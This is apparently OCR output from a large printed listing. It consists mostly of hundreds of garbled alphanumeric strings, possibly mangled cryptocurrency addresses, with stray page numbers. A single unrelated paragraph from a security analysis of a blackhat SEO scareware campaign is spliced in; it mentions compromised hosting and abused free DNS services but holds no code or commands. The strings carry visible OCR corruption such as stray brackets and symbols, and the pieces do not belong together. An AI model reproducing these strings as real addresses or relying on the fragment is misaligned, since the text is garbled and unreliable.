154ADqQNVYwtTyKWh84NcgAyLdirgX7K9Ft 
154kF58D2AX3Z9gyPAtul 7v3e0QRLf3hdM 
154u7yTEA0Q3YnLMZhjaNLMBTFCmTtDnpu 
154vS7RvmPKWF4VyHZmKs8reBmJ837nNeM 
154WdC2QE423yANr232VZPMZYtrpbBxXgqm 
154XppKmdeUx6kW7ZCdYD4u64FpZe9kFSb 
154xR6ECXGVbNm70XVoejiQZ4BFQCBGfox 
154zk4Pd4JVV1t3TwrhLZD9OLPGybBcHJYR 
155bXEG2qSr5xTnQkrCHXLwZZoLS7d6mfN 
155PAEzmx7rWMvjulyCgu3ELkA7il1RReHP 
155uRkpdz87C9LNM 7dKcWJPAor21NsRRLU 
156B9SAscGh73TRiKrSsYPePINbnKwJBND 
156dyxpaBUWLaps1VaptHeETZpT vuizMxf 
156fLsj8ys7qaVv6UpCh8HUJn3gck2q52F 
156fXcZdMeR6tAq4C41YXBtNk2KxtqqhYC 
156suXaNd4dXEBEv47paqzakY4bPDJ9XxX 
1572ATVWE51xcXhq3zXymgxoK1SaPf9ToP 
157BeHAFv7CfEw5UTRHn5Q3ZQuUVNBsSwAY 
157eDchYgdxsCpFWrMhoMRhkgFzqwwxQqn 
157EXHBdzzdoeZsfrqvz88xUz269BN8ptF 
157FipGAq4NGDewuLgqjQ19WsAeCAZPB4Ak 
157GKg3)JqVjpV5EPESQZ8UjWWDDdsyQsbK 
157SyQTb7MBnWYNGGuZJt5LHsRzwtaHg58 
157xcKLdk7aooYiKHy7qjmSmAFfPGG1DKK 
158FVmDfbScr4DQ8Nvgmdu3NZb4HEu68tG 
158QAHR46pW4bCgbCmwiZgFtrYzGma5Fo} 
158qtcLjjuVFrsnXqAagQf3s3TPKHNcxhx 
158RJTYFktRAdAkRem4WxVtFqEZ4nfeRyP 
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158UR2hkaqJdKJjJCsguzTVwnzQFsSYJUKC 
158ZUaZkmAxitpZE1xgRNMmMNPGCVv6Xcxtu 
159BetAdpDpPDngXYUZS5zeJkgENin1h5G 
159XJvqohdPheqwRrHlyZw7ZfbGjxtXiui 
L5AANFRtF2TESNVFZtcL8bFxwstjfk3Yelf 
15adza3QjPThnbbuxzfwFGoP95mPXcprR5 
15AgkvQMhAuw69wX8TgKyHBbbyKqw7qLD7 
L5AHHWVK47qginhdoAeNg3Hzz9DmsyVuAKF 
L5ahnmQEsWFakMkJef68aP2xhfwnfsYaWd 
15AK7K8JoWc9gMDyWpSDfeQjJhLHfhQveDK 
15aMPMYpPBmeobaH1Cfsq85yNBidCEL1F2 
L5AMyWxFC6nz5oLfNULFRCfXLWbe6NxPvf 
15aPt}yluRqVFSvVTHfMomLRy1tCeY4Ug8o0 
15ApuhExC6G7s73FsonUG3mAihLAbcwdha 
15APyXNjhHslEesrxifTJ8T lgyUDJhzs9d 
15aQHc2VtR92FHLENVWwt5 1lwR2jfztbNpd9 
15ArNurR8UGEztNccfEUHyxP2WMujbPxRf 
L5avSbe84iVjwyxBhwWLZYQhAw6éibELCDp 
15AZeTX5TIcsU2qcldw4KZCbB9Rpd12nMAy 
L5b6OW5AYpGbNtvGb9DJHZahDNVaiUVeEGd 
15BfuzLDSRTjUCW5GGjTA7GrVyWzYjRAPj 
1L5BgujhDj 7w3YTz4yZVT6S67xU5rH4WXkb 
15BH5t1q7tLPst6qxXtmmwsZ6eZ8LE28xD7 
L5BLto1l63jNhFqqzV4xqiqwyD84]dJYHJg 
15BRaWQUsdLvj3mTS8GmzoiDt66G1pnZuk 
1L5BSySCAcsNbzPKh7ZCVtM1C8xC2PsY6qb 
L5bvHrf9t3dpaWsewdA5dce4pCkRrqoQtZG 
15CBSvUwvqSh6HQQfuLURRsb21x8dC31EB 
15CoZ4HvHa7ultZ3v4svrg45RBwjJSpmJHG 
15CPKXd6u1SVUjxeXnJ5ZVr4DpTQZa2r6A 
15cpWcbAwNsBhNgsuhSBCqvCRnjFfUGhgY 
15CtQcdHovcRbcvn5KKH96yu8YS4UZzyZD 
15cUTUGaM1p5cYGTHxESmuetHi65K)jBHP 
15Cz202VSAoMaJnVjeZX4nubv7zzs30hFV 
15d3LaYtmTNsQ2Hrea78TstNRCcetS 7Jf3 
25004 


15d3zQgy5Fm4uQpKmZtK47UbDRgLz8Atsb 
15DHbrag7ACbHabhH1CHNiLGXbvXE9We1W 
15dZSP1kkN6nQjJpuW6zjPGfeKAHneRNjZz 
15eCooKYwRskoBFqpRGQEipuBjBXQ9GZXt 
15EDPsV1x2JhXm2N8iDo8QUEyFdDZj8ane 
15eeRQY4Ewlu2bNWjTYgUZYnPuapKXdB19 
15eN85FXk2kVa85FjTp2tzXBq55tvdsxXLh 
15EoHmvvRJMtzWsUeW5K4sn3KSKYfCWDrZ 
15ERckzZQRX9Ex96DXLUBb8DzxXfuC7HP4ja 
15eVetKpULuyb1wyYonTojSHqWgseDs3mF4 
15EzSoDhYuRfajiHREbtgwUAWRbxAaWcac 
15f8w3tNeyYEYuBgPk]FysKB25Y6hFRXPP 
15F9QLbk6reRJbbqfDivl1Sms4HqUM67nbm 
L5fEHqhCtyWUgeYStrfbhPC6nind53RGte 
15Fhumh4xsmJB4afh9AkNJwoYq7HxsxZXS 
15FqQ4xFYj1WJJnUdPxJvGzcprp74f5rDPv 
15FsPoDLqleaUkgRZQuFegoPixiMMEQQHM 
15FzYwyyAtLmUBmGDdkyCgHYEyhL8KAjd7 
15g6vostXY6Y6003933eK60DpxYyStCFVb 
15G6zZUc6ROYtfsgib8q6PA0QJSUUN1sf6 
15ghzLjPyix79GegnZ9eeTGeKfBSY7MA7s 
15giU7bt6US8TK9TwgbXoaQerHFzZGEdpV5 
15gm4YUGRdjo33Pw5jjzRgQVFMzwzAf1Tz 
15gMi3deancT2sxkK9tDujfDTAFvzT VUdqg 
15GnVYvni8LmMDuS6LMNM6UouuGgSRkMyEt 
15GoPGWecPZMEFHrgCLJhFMUFaTU9HgxiR 
15GqrqiLQf1lFfobW55yjUMkuyq7ktNDVuRT 
15GTDSWZHvFXNfnHxFQbRHFfFqEe2Nqos8 
15GUu4vzt23HECUCTuGLjj80KcJ3csY41j 
15gx6dPmc9rPdm8xYWSsAYd7bPTZMcJHzT9 
15H1CTPmgqh1DzSjkD7ucNKa3WtDexbjJdbR 
15h8k7MCmdF5RBCmDpv7A2zGk9ytoHtPxW 
L5HOWE7ADd1mZjYPGjAj 1jdFjJwt7 qFt6F 
15hduiJ8gzsi6N8o0er7YjibdKnZRaBMae7 
15hnEd16zX3zocm85WRHQzzXPGuomMRvF2 


25005 


15hNhWeS5aNCxhGiN5TGZDviEcn4xnr6Wvv 
L5HQWDDSBAFXYIfSNGiJiTyykK1QxeQ4e4wx 
15htbLBDVryRCDzLqR1ibyulmzdHvGMgQHz 
15Hv3GUg3WjflFWq/7fAToNit3LXsbxS9Lt 
15i1zZ6GcjQoy8FEQkKhRSHEXGAUENM1v3dG 
15i244yv5W72NeD1t5GFpQL74bc4pvBpj6 
15i7bkLqFHZaXkSaAV7mD8TQLUNu2qvhSY 
15ieV8z8uXgAgKLGLG4KhWqNMFdbY2D3kN 
L5j4KMBTfyoiajJi622SAJiWeqe4j4f5EX4 
15JamuNDKLWUHKn7G4EqqkT QUwUvau8RES 
15JBaN2nQ6G4CxfQBM6uxavYafZzDARKFda 
15jcveEJxkt3aroajFvWinpH6EefRH2BMY 
15Jgk3n9KEF4gmPJM8pwLUJ4hUYx8WxukU 
1L5JKAKvrzHMddxojcYCG3xzERDoxyepYA9 
15jkXb5wWcjki87 LRNoPWZhocK8zqx9LwZ 
1L5jnRnV8AP456biFeBddWe8MRHvcd50nQU 
15josrUqg7Zchs6dMjosGh8a5zY2AuMuxdXx 
15JqPH50ACs8HFjvWPofAKUNNSIRfx8yFx 
L5JRAGY48XqiaEAzQ46yRc8Ane4pDtoDjE 
15JRAHiTZo7NdRJHEeUYXN1sWVY1TW4yk5 
15jYZD7fd9xkVmMJp8Sqoucy7RLNWXX7ik 
15JZBERwnUeHCHftxyVNYt3MsxYJodNFPW 
15jzUr36UJQGIMHCGwzbYroDVEqV56vmiY 
15K8cmxo8EUPRo2AyhdEphFT4PL9KiFxoU 
15kbEQ91yptiF31Hw70GXmcNv3RogLVLZB 
15KcwwRsu9hZ9mVo3b6bm814rVpZFwMXx8 
15KJxFrnNHzjBZKULMq9JXxAtrCQ4tB5WP 
15KK3cxwsk9igvHDCGnGtAc6ksNGKXcdsD 
15KmaYJoapRwS9GaUanr6QkxdJ1loAwcmB3 
15KmepXrajM6m7Rncy5RtCwSXAcNTnPeYg 
15kWzg1tf3v78kRsyVKjpxFf2WMiFN8HhG 
15kxeiyG6HSqzQryqei4yvyWeL4kzpzcBW 
15LWrbHfBaJEF5iWjXvWA1Ee1UrY6yeoPE 
15LX201hzwMkSgvgAuC7aXxGFjiKJPqckM 
15LXSoSYkuUQBWNdPt9jk6GFq8S9SdhVYqZ 
25006 


15mBAXCrR9d5vEyKjS1DEBEc7tUb7NwTbw 
15mMGM5Hkjic47WnRQ52F9vBfwnr5K1XSbk 
15MhjhXe8ch8ArGwDFyGS1NFLDnRshbhgt 
15mq1UYR9RFiiLrJY¥6aloYY69DNUUVIkUzh 
15Mr36S9TY2n9f5cQAapT4JZMLFx25BM5z 
15mrHH495WhVDjnhg5YjB7WDaXx4A8s4ZKG 
15MRtxrDnXn2vFxzmDEPiWtkWbz4axUY8i 
15mvmcbHuo7RV4LURakaWZuD1d20yomPZb 
15n7mqTGrPcsMDugYqAPU4pzYkt9Z32nMT 
L5NHPTVpg5TPz2Uj125pcS58nugDQ8X7wnq 
15NUdB6SbCH8nBLAjUrBe8SA4V559PpwsQ 
15numt6YRPT3fBxWXW8YwvLPnKfmHo82Cx 
15NVxocySPcTjZ8MBaVeu1lZBhtLgKTzgrH 
1L5NYdfvSatUTn44f42GtisTyN1fGpxdw53 
15NYKEwG7BDRA3RS5x]FSU8McogYDfBuXV 
1505SuoAvwA9uNapCc893Py4qveYGJ954N 
150bnroTPe2CExtnnY5Mfbedg3vBZ6a513 
150eBLiwolPC6buzYbEG]vt31GqETcs38d 
1L50feoHMqFF4e7JX95Zfh8s5ZHrZVs8L6T 
150WQNSb7ggnnfEQzGE94Rx7Fdgs9RhFkh 
15p1RYokbUQ42aW7MohaDFZgzMGWDAycKQ 
15P2QAtYhw9DMge2FzasCx1WD893kX4LSb 
15pDjwUub4Z4hngZ6HC96McrTJurV9D8gG 
15pfvGjmwiCQj54xVcshW2f1SZ12KcstuP 
15Pg5eHjdqAH3AKXH9X2xuDc2)JPuttirg 
L5PJNHS9QDNEM84dtyPEZzmRtK1Qaqz2iyc 
15psdyYhyssnVoPF6LBjPLKpwzVuV7GST4 
15PTEpLhNo4WFyFQDPFmdtT4aScEgFactht 
15pTkrzYX8e81Tg/7SVix95qBK2uhgFVj1T 
15PuQpEwm9MV91LRCKdYACE7 pPHr4fFL6cf 
15PWgtanwuekcdmwC37MXKXzLrU93TVPZY 
15pWMYtJyaZwowhpsjK7kPmsi6eny984Mc 
15Px8K1bDDapUrAn92vv6yQVWWRflceDgZ 
15PZxZMvravofs2sD5ZnRwQCZQhnTLVh2V 
15q73izmyuEtZ1Mi4qgKBAfGFkJCM5Azvw 


25007 


15qavY6DCmGwkWo1qPzt7KvL3MFHmMkvSo 
15QeUAjqciuJwuB3Pwdk1Cpsi21b4CeLz8 
15QfGabWbDNsRUVbp7amw5xe3AgsUATRwk 
15Qhc2y2EnkGAbFeDVS93f7ECbJBvmFwa5 
15QjlieHKP95eAqnjT80EnuTmfnMJVxnRB 
1L5qjf2ThHU4eHkyfNxrMVEZKsswPelFyaqL 
15QJnfidLyWpezPvfb5UziFrm8JyatiD7n 
15qJ)wZdGzxVVNuQJqyyiY 7bJ9FGdvmjQWH 
L5qpEYJVfvxpEHPq6LaG9Tb6RFw9FkdGBm 
L5QQHASt3rK3CgpZs5T2x4n3tpffNBkcww 
15QUGrDsjJ9i1kLT6ETLQbNR1IwXg5UVKUG7G 
15qVTezGX8o0e59u8qfnv3igqB55nshiVVTB 
15R1xwUNmJxsJEnCNdgbvSNupehtyuHinF 
15r86ugqCXeCfknaSRCH865UHyPfruMZLz 
15rB46fSedpHPc8yzMBrAJv651UhK5ySr4 
15rCcMNxu9miVbUWEGfB3Kb3ErkJjJX1YX 
15REYH23ygLJb5a2pYvU9ME2CpzRsKHHgL 
15rh7JLGWQ5viPqvezbVDYiK9grSR9OPBBL 
15rNyo3b8DUXeQHYCeRE6GsJ5fQcRGGiI51 
15rqnqms9RD3cHVtRug5uxPjoNv6JykoFd 
15RRD1qucjdonhAbL5eNKEmgKds3ZsyHVU 
1L5RRshQiACpREpMmH3RqRYQ9YIPKjwqo3c1P 
15rUpherZxsuMchjuZnnenkJUMxVdhwUMo 
15RV4a9GuBkNy12S3iHqcqzyxinc9SEBqd 
15sl1dzVc6vPNqYzhgT3keR2BvT665u6WBe 
1L5S6FKANPMmC73aV7BTPffk19ijwxuntdTT 
15sDe6rBT IsJq7gRzpD19g 7HgdBTeAECqk 
15Sg8SyKMGNggTFIwdhR8g5UxytbJD9j9N 
15sGuAyYVnkoK3MqmvA5h7iyjgHgNNNMhF 
15sj2EdhPVDtd3jEjn2uXgst6WcxbUrocg 
15sjCjaCcfigjnnxr3GM3R1M9BPa5STVQ7 
15sLzRU6sbdjpGUWAShfTkbBhZ5tSNcBNB 
15srN4ZMZYuUE4XY QOrtTejfsFdVBZ9PKsw9 
1L5supo6RMZt95NGoeQRG3DcRj652mjreyYr 
15SvhXznE5a8cBXAPV6RWMUKsWhk9Lg2tA 
25008 


15SwfYXPMghj9Wb9BjgAv1fJSRcEr3Zfyl 
15T84Rct56vS7Q4GEmAXDp5H2qGfqeF9T3 
15TiIGb64pimR1gkhE8ZjXn4tu5kYEpcRjn 
15tqPjB9fyqMVvUFGjAsWJiJZWUWPAFVaz3 
15TSLng8wP3YBiFKJ4ymUyGJ212zjUosvw 
15TUDg26zRv2JhXiecQwxmetHm35Rx8BW9I 
15TvdFApqfQYZUqK7EzZRfTbFavWjaaxXrw 
15TwdePn3yutuewT 3PP4kBzJEqfMyGp1S} 
15TxuaW93U6jr59RUNPLTfydrxXVZfc9U3D 
15UEHrT2DdwauhHQUUPEVD9av2b]7xCvBW 
15UF7Sx3RvkgBAqD8QvpdAHhguGfj4xVWk 
15uFbCHzPfmGT4ocwFScLSgHayraEL9Pwu 
15UheiezZGRMGh2Ds]v1JSKXYSugJcb2NnP 
1L5UNTxXXQRraNJK6PjBTj/DvFIHNNnoqCUTd 
15uXVgTQUy9iIzWEoV1sWG3JDZQexuPURON 
1L5UYJJF6MRB5yPtqhkdyTi9v4Hb6EDXU1Dc 
15v3RjjGocDWJ698bCFAKjYeQ9vHaC3SGy 
15VBt1tp77zYK9n34cijnNdmgCd5E1NEJG 
15vh73heF9dbawgfz]SJ2L8dVejXK6mxXk} 
15vLhxxTQjf6ErLkZGzZ6UiehK5Rxc84J8m 
1L5vPNttzvNoeaVmDjaMojveJH5iVfkaifR 
15Vr1ZZ4wHZQeU44FsBZTbx3wmnNXA3muH 
15W2tYjfMWbEaZ9MUvibczDioXX1fywsqQ 
15WDfXrXLiBL7KE8uDRFdEkFsmirgqrRaAL 
15WDgaFHwDaBFuT1tPMaEz1Ac7pyuC7UGN 
15wGs1Ry3]Jf35mjxC8SjScDybCYfJ3k1d4 
1L5wi9gvHDSAJuPuowiwg8hjXsT8ttF791Z 
L5WLY8frkx14RJEu7kKCO2MEWLVYzaiVwhr 
15wnfSSPwrupsYM6z74b9DxP6Y1uF567RE 
L5WTTItMkFMsJTpizoVMiEvFdHdU4tKVK6e 
15WuTjoY3zhu2BqxXnKQ3CBq7RSYTGZPH1u 
15WyMdr8t6Jza8XxWsUkJcKtNbLE4mwHig 
15WzwebF5jN4Mhnqg5e57TB6Uuel ZwiLSiY 
15xcx2sNNAwXyQrqvjJuUiktCnURf2dUAe1 
15xE77usdqgjRdqEfgkKYLezcvkxgnkKqXxqU 


25009 


15xivRS2CKLL35SCYxDUAaiFWheffjqypf 
15XmLcFavaMEjbAtBVSmCQhZqcAJDxDZPS 
15xnvF3SGwjB686CBurV22HQwaCsgB942U 
15xzzh4EVt2fAV8DqZuFkg4nyLWxJyFz6C 
15y3wbP6a9Hoq6wCHxouo6QTJKMCZwdcy7 
15Y8ZoeoDX7J5uCM18eP4YfaLYrxpy6uqD 
1L5YABdPTzn54dJhsiDJeV33GZ9yKD9L1Lj 
L5ygQn9DzeMG4snkuiLNen2HGpv2RbZ8pg 
15YjKUwapboaFkSKPWjrGlcsYbcGo8zLce 
15YK3dfdwjcj9xbokWts48YSeLXyFgcHKT 
15YndULbc8Wb4mMrGpinizDKXvjmajznES 
1L5YNK8ZhbZ6CeF8DWX3b2t3pyg2c8ea6UW 
L5yNpy9DbLnfw2iz62jNEZV4EaMPCf4WXo 
L5yQxLxxWTzzUkmrA2LNWWuQfzTxLnAQj8 
15yW5Q555gJxKGLZadnzcVvrY Xo5NiiuyvC 
15z2BbcHJHNuPCr98LDS6soaLueT6PGLVt 
15Z3ZBCi2RxP3xNCbfzcCZupRWCTdyJtDN 
15ZBq8sQiba43XUfSXCCCim9dkCiARZ9IqS 
15ZctsKiPe8nLFFNWGicefgF545cQxE7CF 
15zecSCwGDARzub5yrou9eEVBfCPrwW8duh 
15ZNRXsiQ8GXP635dkxgvxenCZJtBrFGE7 
15ZnVUHi6btV8DMg5j65WnstKM3DFdla7A 
15ZsKGVexXxoj4DF8JTWo72wqgRgZz8BRbP 
15Zvzq7uiy5xP8DDX4sDvLnH5ZRP1i99rG 
15ZY4xtflPWkdrrenhxXyjgRZBosmyk2E6p 
161C9FrEJKKtfhDiPenDiBASK32FkjUC4H 
161qr4JbLWP8CqFZzJu9jTabo3GbY8v6yt 
16231qzZLBEtQ8vEfspvAjUanAx114r1H9 
1625fWb9YGHbE81kGdkonygkoXPvyUbTDD 
162HgXVQorizW7GkRARUHV6y2exgZMazjT 
163A2U2sVC2QjTdGJiTWegXzTRVTut5Jg6 
163aqEXMd5yAZgDqwifF8tXq7yyxXzCAGpz 
163gXKqUKQQgj5iuPVpJDvmLSWQs4eQnvv 
164BFAnwNbmRxUuUWTX8Aau3zSqwcw1Qjzw 
164CukEeD1GF9bsrGW2rHv44xuwUHgampE 
25010 


1L64kvFNWqV22cVrEYKhmMAdH8fV8SiDXDj 
164qBkckbdRCmRauz58rm3jcmktQ3Sf6U4 
164woCs1fY¥KwyUTroKwSFYgAiGeZzjUSiK 
164zf1CiIB5HWmxosQCvLZsDC4kSoWpBp2i 
1659i4SE9yGZaqonL9QF74dg378qBsse8q 
165aLodTKjZMJJSQiSdUijLEhnwhydhe4L 
165eYxQM3CkycvGJV77hTSS5TE7rQw4krv 
165jjwUQbu9MSFCXnWqGjLRFloefVURWay 
165up5ueVLuFb3qu4VZLreuCYn7C824F7X 
165vtA9Zdd2e3wxXJCZXQGqnMSwHr3jU2t 
1L65W3tBiFz4cEaTXR2SrRfUdY 8u4kKuifSo 
166EhtUfdrnW3EdidSTh8tWDCVzYpmNWkn 
166ghxu93yp2Kfz819nNk17q6qA34wYffMq 
166kx92AESr6WZaMD9vZCUGYiH4aJcmVyA 
166qtF6BzzvN6izVvyTtyKNbHEUA4Ejpu5 
166snzhezkmMERYDJ20GkURnzSvpX27CBQ6 
166wbpRD46p)yshwdUUZLB4Goyhp8Wbfd4 
166y3WDMrgmGX2AVBva2yLeKaYomnxFw1) 
167HDDg9BqknQ6NyY6RfLNNPhYMUjGTUou 
1683GYFDMZpPj7645yLr9jd9jiHCMWABWn 
168KQtJ1X3EezsYbXG1lg7qtELJuzaXPKqT 
168Ly1sTteQwY4p3fBSVXLPR1xBPeouPXc 
168NS46JZoftoxwTRcJ8PGtizH4JS3kD8y 
168qvYsb56vfxDLjdPWinDXZatKyAW63yD 
168rwLEsxCdXBVDhno3aTNJXH4vzzSyVZS 
168vEvrpv1XR26pWWxHhGdBHYxDY7wTL3x 
169cizeh1K9zzzvTCyUdPNdpXD4T9xCksp 
169eiiIWHAW9o0pf29KM3srafP1VqRRuWeie 
169irpXNYUyZe2BdZHyzSBakh6ZLJM4sAR 
169nwmQU2RWywkKcqwYYct23wcLcRQMPcD) 
16907zfeeD9E9xEHurl7Kr7VP8ehzrZPka 
169RdJPxuainKdmph69hviM4pMJCqERkKZP 
169X8cH2prafcUbbTvDaHQYpfrrPDSCs8Q 
16a2xxYijFn3dure9NBKtkFsfrWabnLjQK 
16a6cfxMBEsb1mfKMPazWSBEogPbe4iH29 


25011 


16aaTXiIUW95HS35HtBgyZoBT6zpg4cVFsD 
16aAVHZRDnv89v7tmdWvnPJvvWUgMzEzM6 
16Akt4JeRRKySZKDBRJEEweBJ8JRpUp5dE 
16AnSRPD7b47EfCXYRterzhtonw7ubvScZ 
16AoBffzee5Vrk5eJq8)vtrGiuTWcih3fH 
16Askpg3LrqRINDkBHe2MwzUVzxbiY3d60 
16aVB7BXZxB3mMN6S3XAqka7jcNFVkKNmThw 
16aWJpWdXVbQ5iQ8RUA8KQdtRxjRoVRVVf 
L6Ay8NFtNjKt2cb6V7u2Z9rVy9nSiF32bu 
16AzKPt4obuDViIDQcmoP8BFCJi2Mx6b6VD 
16b4rFKtLy8NGS3etfCCacppos9j3GTdFp 
16b6ARmmfGk5d5cyJswPVBeboPXn1NjXpM 
LEB8wt6haNU4UJmJCZMvRR4hj3rPpq6nZ2 
1L6BET28wakjWbhWjJa2aMAuEnmRijqgipy6j 
16BfDdeYT2udv4DisMjLLHTd4eonjKTCEr 
LEOBffQBWoytK8cRwkvZ4GSqbqxVS5FQSf4 
16bkzEDAaAgXrjrwYduU3hCjxFwLlvrv165 
16BnAJ2aqwPs4gKDkyUSYnxHbg7YcAmhkz 
16BTVydgvQgdQaqy8S25Z3Q9V2cWfg44w50 
16bUc2JF4cFQDPofLtpTmV2E5p84Fv1MFt 
1L6bvVjKjh3gjsuLWAfA3uxSmHjSwvfrwU7 
16cBXVMrko8bSicRDk5nzTpCwyYqd7zh9S 
16CciTU4Gx63rGgtgbFJHKxSH9V6UFByK1 
16CdjeHGdZZNXuGXVZVLmJa7xd6bduyxXeC 
16CDpvAP14WB7YsdfCwsAeHfbg57xankKVK 
16chPHSUmuQ7fh92tHzcoGttWNp5Hu5HT 
16coqsDiLZbDNFRGu4aA5cmgkgixXeaaU2yB 
16cVC6S4LvngsaoH9g89PYCSPgKGJHTknB 
16cXM7NntiqQz4p5aZSH9cCDUCXWicpXvF2 
16D3HWxaA5FL9OQvPnuXamihffKV2STecZA 
16da3uHVi7Pv53Hbzi6ZDBC1KQuEt7oDny 
L6EdHNN1IRP7W6Wp6WMHHx5GzR67F2vmZz7B 
16DhR8ToniznluGqs7P4PRc7cXyQndyei7 
16Di1ZKN6w3RX7BvoCCvzbCBwj844di54x 
1L6DiIGhABMH3dQAQMJ1hD1k7jcxKzC64P7R 
25012 
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How did the cybercriminals respond? By proving that this blackhat SEO campaign has been 
well planed and coordinate a long time before it was executed in the wild. For the time being, 
it relies on a combination of legitimate U.K based sites, the result of a evident compromise 
of [3]Web Hosting Mania due to the fact that all the affected legitimate sites are hosted 
there, a growing portfolio of .cc tld domains, automatic abuse of free services such as myftp- 
site.net; dns2go.com; dynodns.net; thebbs.org, and systematic pushing of new scareware 
variants/redirector and scareware domains, which explains the low generic detection rate of 
all the samples obtained. 


Moreover, not only did the blackhat SEO themes expanding in the typical randomly generated 
junk that has naturally been crawled by public search engines, but also, according to publicly 
obtainable statistics, millions of users (collectively) have already visited the landing sites, with 
42.80 % of the referring site for a particular domain coming from thebbs.org and 31.97 % 
from Google - their tactics are actively hijacking millions of users already. 


2504 


16DL6kLGpJwV7h3pmNygunJSKH8mBLEPFs 
16DoxP5GCYEi6Sdsed5Bu5nW3)JmH9odiTS 
16e1yoEpMR3R4sEAi5GEbnWKrNVApYA3N3 
16E2cnDBBGj6nywFUYQoagypG76CQQq3cz 
16e2UW3Wf7w8KxGYcPL13ZacwvuvNyKrYN 
16e9wWUM4VwKG9DohxXQV5wbHMa|fg85Caf 
16EbWBe9kgmCabfiCbrZzE8ccmujY2eCbXx 
1L6EED3WVSUTQ2vCn6jRCQLMjm5xp8kkC3wj 
16EDTPCBUAtRNrjzsB9v3PRrUMHjZMZQ3v 
16eEVt2PMqwjbmht3wSeepBvu2VuuBvaqba 
16eG67ovFv8ErZJkdFV4CUMPABRytnjVim 
L6EENDUTxhXrowWXVNAxm6raGVtafGccbK]JK 
16ejZhd7eiB64STg408wPUZKjTZGWN5YDB 
16eMkJpjcS5QRRJMLiIFMeqo9dC4BGwhAenH 
L6EQiwd2uvujUXtycgmC9hKqmBiJv9dvoa 
16eSEi3R6JcbkUQbrZ7y1siMNz6EsRSLVS 
16etfxhUmJfPhvaf9i242TnjijcYagojxG 
16eTOB8kbEWLk2wszhfgP8VadBziJYj8Bx 
16evS2CQ8ZVbSp6L7jzy2fJUpVMxuoBFNn 
16f1bNXrPh9PFEFVoe8D81A1xtziKmw2R9 
16F7C1U38dC)JJChMqyFlpsYGBac2wistzw 
16FaZDoK2HzZRqKp4wS9yYvUe9Kfy5NPHCa 
16fe7r84yuQgqMib35zGgethrNG1x6hin2 
1L6FHC7cLgybiVBdJSFduwQPz5v]vkx8ezs 
L6EfNA3N8wxlgkWseRWu6aAkNW2rxXrnWgx] 
L6fPUASVHpgX12bF]si6yob5PMSVHW9xzUB 
16FS5vbdnAkoK53mp67R6uULNPWMmCi9G44 
LofwAfEyyaAfq8nW2Xr8dxrl4hQKebWaqcS 
16G4ZK3NhDysfX6APEMVTQRYTJNWaqsyVx2 
16GJcf43XEv2K39kKUuHxXDiCYK1sGuEaT3 
16GoZU8FnGmRmbj5G8pkGqENRJCH8Cfkxo 
16GSZhTUGTSx38D5wZgZ9HRb5zCAjH37MQ 
1L6guhwsCnwbJGoibdiRkyWULbpdZBjtwdk 
LEGWNLV5yw8p12d8mv1JfgoJvoWgD77Wzs 
16h3TQzmcgvx3sNKWbQ9FSZ5iTzqbxctA4 


25013 


1L6HAr9UGNoBZZvdW2SCuXLAHeYNDjZ92SK 
L6HEg5LVaHzaqSivNse842ksGmMWSpZWV8 
16heSRPNbFk4Pm5Cne7udoFNuqVpijaa7) 
1L6hFv59EYfQNnNRh7Ur6V)7YGP6ZFbA1gbH 
16HkadmvrLQ4HbHNYk6cBQDNKgsKeQ31hG 
LEHQ8jQS9FKHCUSMYvxL2b7yn9Q5XPPW4v 
16hSjnd3XBZLk9ZHQdK2Fq2Mfgh7tFVtq4 
16hwjeiugbqnaxXxCMN5tLychBk5cf9BzgK 
16hXd7RQYFMahTwMyM32FKmkwpd2pZmUVW 
L6HYTyx5pDM5BTXWS4BHnPNGxHbGmZgJQx 
16Hz38j3MiB)SouyGFCw9prs2UiojBfZAG 
16iHd4h5JEwVfHZPsdWaaYDyNfdTT8Wn5R 
L6iIN2cbWh5hJAmx3pvYSnHPVqounbYC8K7 
16inP3LM9LX2TSLJUcfXTADLFfpdjJMuoah 
16iSf9AGBgqaYhtC17fcD7KDgnGA6wrpS6y 
16iTUac8jkf4LPud1SZBGJiyKWcoFNPA6T 
16iWzfcoM6DLcRbkem5uB5Z3neextFEwfb 
16iXGK9cCGA4S9eF XhHANfmxvYA2q9MgVt9G 
16J3kkoKcu87PvyoE8hbVX2TfG7JZHSUcf 
16J4jVhJWAA345r6pMzB31fingJFTZ57Zj 
16j9Wv2e7P1tkPvm1mV6wBh6Cr9id67cWT 
1L6JAYryU92p2AGFKCCONe3j4gpbNPoAzIs 
16JCetCL5QJwCDdV6dzPcqXvAjgBNREb2b 
L6OJFV4N6dnbQNpRGyAA152p6ZAZehQEe4Q 
16JissLBPwrcL3G48MoUCRT5Cea2V3e2WE 
16JjCKKROGK2P5HT63BW6ZPDSt3PfxhiSP 
16JmzfLt6d61EVHVBMVZBQQLLxMonXAuwD 
16jP7ARHCUW3QhPZ2wGhMXxvxZfDjBkUPq 
16JP9jp9Pg65zmyU5A7abXyQsgN5JHAtBB 
16JShqZRpGfB2FKFh9qMEmStnAHd14dBVP 
16jSXCwYe2FJamHhLjwxx9c8flaDRr2RMr 
16jUaqcZYfCraxhEyjSMHaEdiBF4fG11We 
L6jWHINy5q8o05JBCikieodz7f5YDLAgGiD 
16JwStchzopj2zqsceFCdqoTAAjAntR5wA 
16k3TE9FIF8ho6Un35JRDYmJPqVkUhideB 
25014 


16K4DRfBtNoGcab2UCpHf25gTDYwfK58zxX 
16K4xXBSxzTTF2RYKs8pwh4HQAtxCxUwfu 
16kcoxUhwkTvJ9RiiDvykKNsS472to34H9S 
1L6KKjJMU90Cfcc9k32ZTe4BNyZ7tliWgFXK 
16kMzR2jyRakL9SpMdarlypkcWqoLyY4ygp 
16KSjdeJ45dgbN2mMW6WUxAvqxYSPg43M8i 
16KufRBE8i2ZayHpR2w5REVqktcWW21bz1i 
16KV3gFS4sxKrC3cKh3wXRSyFLKDh1jS24 
16LgpzvqlYDCHAbznFbk2zVhbAKKJ6)22f 
1L6Lh6fdsfPki7YKNU1LBB9UyFQ5FTIwdBE4d 
16LQ4Y3A4mh2w8eEy6u7CCu5gy8UDVXR2m 
L6OLWGUj2T7HtEMBL14npEHhLesKCZKB2NT 
16LZePS7S9XEy22NJFqkv8hajCFjh8j8TR 
16LZKES4fBDftk1bBBJWtvS2NJPVg5MpMi 
16mDKUxhaFXgDGHp4cuqS6KsidztVaTsai 
16MKpkbUvoaa82c73vYjHHF1MaYqoxq648 
L6OMLN1IS4iERWFVfope8i5df3r5x9LMKP8Y 
16mMBwtsGjy6U67Kudwrhw3hvaHfPw9Sxi 
16mrfFZ7KabamaV7oCjipJokdbZmCnQbxd 
